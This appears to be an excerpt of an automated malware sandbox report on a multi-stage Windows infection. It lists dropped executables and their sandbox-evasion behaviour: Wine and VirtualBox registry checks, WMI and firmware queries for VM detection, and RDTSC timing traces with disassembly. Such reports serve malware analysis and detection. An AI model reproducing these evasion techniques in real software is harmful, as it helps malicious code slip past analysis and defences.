                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\spoolsv.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\spoolsv.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\10128580101\6f3323f1e6.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Found API chain indicative of sandbox detection
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                      Found evasive API chain checking for user administrative privileges
                      Source: C:\Users\user\AppData\Local\Temp\10128520101\2qv26zF.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_29-22759
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeSystem information queried: FirmwareTableInformation
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128570101\ab5415a7b5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\10128550101\bb5ad48269.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4EE5FA second address: 4EE613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007F4C28D8B356h 0x0000000c popad 0x0000000d je 00007F4C28D8B35Ch 0x00000013 js 00007F4C28D8B356h 0x00000019 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4EE613 second address: 4EE623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4EE9F6 second address: 4EE9FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0810 second address: 4F0845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D038Dh 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 pushad 0x00000011 jmp 00007F4C288D038Dh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jns 00007F4C288D0386h 0x00000025 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0898 second address: 4F089E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F09F4 second address: 4F0A21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4C288D038Ah 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4C288D0390h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 push ecx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0A21 second address: 4F0A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4C28D8B369h 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0A47 second address: 4F0AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4C288D0393h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F4C288D038Ch 0x00000019 pop eax 0x0000001a jns 00007F4C288D038Dh 0x00000020 sub dword ptr [ebp+122D31F0h], ebx 0x00000026 lea ebx, dword ptr [ebp+12451726h] 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F4C288D0388h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edx, dword ptr [ebp+122D3319h] 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F4C288D038Dh 0x00000054 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0B60 second address: 4F0B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0B68 second address: 4F0B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0B6C second address: 4F0BB4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F4C28D8B366h 0x00000013 mov ecx, dword ptr [ebp+122D2BACh] 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D35C5h], ecx 0x00000022 push EC3C9826h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F4C28D8B35Eh 0x0000002e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0BB4 second address: 4F0C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 13C3685Ah 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4C288D0388h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov edx, dword ptr [ebp+122D2A30h] 0x00000030 push 00000003h 0x00000032 mov dword ptr [ebp+122D31F0h], edi 0x00000038 push 00000000h 0x0000003a mov edx, ebx 0x0000003c push 00000003h 0x0000003e mov dword ptr [ebp+122D22B2h], esi 0x00000044 call 00007F4C288D0389h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F4C288D038Ch 0x00000051 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C26 second address: 4F0C3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F4C28D8B364h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C3C second address: 4F0C5D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F4C288D0391h 0x00000016 jmp 00007F4C288D038Bh 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C5D second address: 4F0C84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F4C28D8B35Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C84 second address: 4F0C97 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C97 second address: 4F0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4C28D8B356h 0x0000000a popad 0x0000000b jc 00007F4C28D8B36Dh 0x00000011 jmp 00007F4C28D8B367h 0x00000016 popad 0x00000017 pop eax 0x00000018 jo 00007F4C28D8B35Ch 0x0000001e mov esi, dword ptr [ebp+122D291Ch] 0x00000024 lea ebx, dword ptr [ebp+1245172Fh] 0x0000002a mov esi, dword ptr [ebp+122D2AB0h] 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0CE0 second address: 4F0CE6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0DA2 second address: 4F0DAC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0DAC second address: 4F0E00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F4C288D03A5h 0x0000000f pushad 0x00000010 jmp 00007F4C288D0397h 0x00000015 jo 00007F4C288D0386h 0x0000001b popad 0x0000001c nop 0x0000001d mov dword ptr [ebp+122D31C5h], esi 0x00000023 push 00000000h 0x00000025 jmp 00007F4C288D038Bh 0x0000002a call 00007F4C288D0389h 0x0000002f push esi 0x00000030 jg 00007F4C288D038Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0E00 second address: 4F0EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F4C28D8B35Ch 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jnc 00007F4C28D8B365h 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F4C28D8B35Bh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jp 00007F4C28D8B360h 0x00000028 pop eax 0x00000029 mov dx, C9A8h 0x0000002d push 00000003h 0x0000002f call 00007F4C28D8B35Bh 0x00000034 mov esi, dword ptr [ebp+122D2C1Ch] 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d call 00007F4C28D8B366h 0x00000042 push esi 0x00000043 push eax 0x00000044 pop esi 0x00000045 pop edx 0x00000046 pop edi 0x00000047 push 00000003h 0x00000049 xor dword ptr [ebp+122D35C5h], ecx 0x0000004f push 8D5D34F8h 0x00000054 jmp 00007F4C28D8B361h 0x00000059 xor dword ptr [esp], 4D5D34F8h 0x00000060 lea ebx, dword ptr [ebp+1245173Ah] 0x00000066 mov edx, dword ptr [ebp+122D2B3Ch] 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0EBC second address: 4F0ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0B6C second address: 4F0BB4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F4C288D0396h 0x00000013 mov ecx, dword ptr [ebp+122D2BACh] 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D35C5h], ecx 0x00000022 push EC3C9826h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F4C288D038Eh 0x0000002e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0BB4 second address: 4F0C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 13C3685Ah 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4C28D8B358h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov edx, dword ptr [ebp+122D2A30h] 0x00000030 push 00000003h 0x00000032 mov dword ptr [ebp+122D31F0h], edi 0x00000038 push 00000000h 0x0000003a mov edx, ebx 0x0000003c push 00000003h 0x0000003e mov dword ptr [ebp+122D22B2h], esi 0x00000044 call 00007F4C28D8B359h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F4C28D8B35Ch 0x00000051 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C26 second address: 4F0C3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F4C288D0394h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C3C second address: 4F0C5D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F4C28D8B361h 0x00000016 jmp 00007F4C28D8B35Bh 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C5D second address: 4F0C84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F4C288D038Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C84 second address: 4F0C97 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0C97 second address: 4F0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4C288D0386h 0x0000000a popad 0x0000000b jc 00007F4C288D039Dh 0x00000011 jmp 00007F4C288D0397h 0x00000016 popad 0x00000017 pop eax 0x00000018 jo 00007F4C288D038Ch 0x0000001e mov esi, dword ptr [ebp+122D291Ch] 0x00000024 lea ebx, dword ptr [ebp+1245172Fh] 0x0000002a mov esi, dword ptr [ebp+122D2AB0h] 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0DA2 second address: 4F0DAC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0DAC second address: 4F0E00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F4C28D8B375h 0x0000000f pushad 0x00000010 jmp 00007F4C28D8B367h 0x00000015 jo 00007F4C28D8B356h 0x0000001b popad 0x0000001c nop 0x0000001d mov dword ptr [ebp+122D31C5h], esi 0x00000023 push 00000000h 0x00000025 jmp 00007F4C28D8B35Bh 0x0000002a call 00007F4C28D8B359h 0x0000002f push esi 0x00000030 jg 00007F4C28D8B35Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0E00 second address: 4F0EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F4C288D038Ch 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jnc 00007F4C288D0395h 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F4C288D038Bh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jp 00007F4C288D0390h 0x00000028 pop eax 0x00000029 mov dx, C9A8h 0x0000002d push 00000003h 0x0000002f call 00007F4C288D038Bh 0x00000034 mov esi, dword ptr [ebp+122D2C1Ch] 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d call 00007F4C288D0396h 0x00000042 push esi 0x00000043 push eax 0x00000044 pop esi 0x00000045 pop edx 0x00000046 pop edi 0x00000047 push 00000003h 0x00000049 xor dword ptr [ebp+122D35C5h], ecx 0x0000004f push 8D5D34F8h 0x00000054 jmp 00007F4C288D0391h 0x00000059 xor dword ptr [esp], 4D5D34F8h 0x00000060 lea ebx, dword ptr [ebp+1245173Ah] 0x00000066 mov edx, dword ptr [ebp+122D2B3Ch] 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4F0EBC second address: 4F0ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E0E76 second address: 4E0E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4C288D038Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F4C288D0386h 0x00000015 jnp 00007F4C288D0386h 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E0E99 second address: 4E0EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
